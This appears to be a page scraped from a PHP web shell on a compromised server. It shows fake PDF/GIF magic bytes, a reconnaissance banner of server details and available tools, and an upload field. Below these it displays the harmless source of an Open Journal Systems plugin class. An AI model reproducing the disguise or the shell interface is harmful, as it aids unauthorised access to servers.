%PDF-1.7 GIF89;
| Server IP : 104.20.45.2 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/classes/plugins/ |
Upload File : |
<?php
/**
* @file classes/plugins/Plugin.inc.php
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* @class Plugin
* @ingroup plugins
*
* @brief Abstract class for plugins
*/
import('lib.pkp.classes.plugins.PKPPlugin');
class Plugin extends PKPPlugin {
/**
* Constructor
*/
function Plugin() {
parent::PKPPlugin();
}
/**
* Backwards compatible convenience version of
* the generic getContextSpecificSetting() method.
*
* @see PKPPlugin::getContextSpecificSetting()
*
* @param $journalId
* @param $name
*/
function getSetting($journalId, $name) {
if (defined('RUNNING_UPGRADE')) {
// Bug #2504: Make sure plugin_settings table is not
// used if it's not available.
$versionDao =& DAORegistry::getDAO('VersionDAO');
$version =& $versionDao->getCurrentVersion();
if ($version->compare('2.1.0') < 0) return null;
}
return $this->getContextSpecificSetting(array($journalId), $name);
}
/**
* Backwards compatible convenience version of
* the generic updateContextSpecificSetting() method.
*
* @see PKPPlugin::updateContextSpecificSetting()
*
* @param $journalId int
* @param $name string The name of the setting
* @param $value mixed
* @param $type string optional
*/
function updateSetting($journalId, $name, $value, $type = null) {
$this->updateContextSpecificSetting(array($journalId), $name, $value, $type);
}
/**
* Get the filename of the settings data for this plugin to install
* when a journal is created (i.e. journal-level plugin settings).
* Subclasses using default settings should override this.
*
* @return string
*/
function getContextSpecificPluginSettingsFile() {
// The default implementation delegates to the old
// method for backwards compatibility.
return $this->getNewJournalPluginSettingsFile();
}
/**
* For backwards compatibility only.
*
* New plug-ins should override getContextSpecificPluginSettingsFile()
*
* @see PKPPlugin::getContextSpecificPluginSettingsFile()
*
* @return string
*/
function getNewJournalPluginSettingsFile() {
return null;
}
}
?>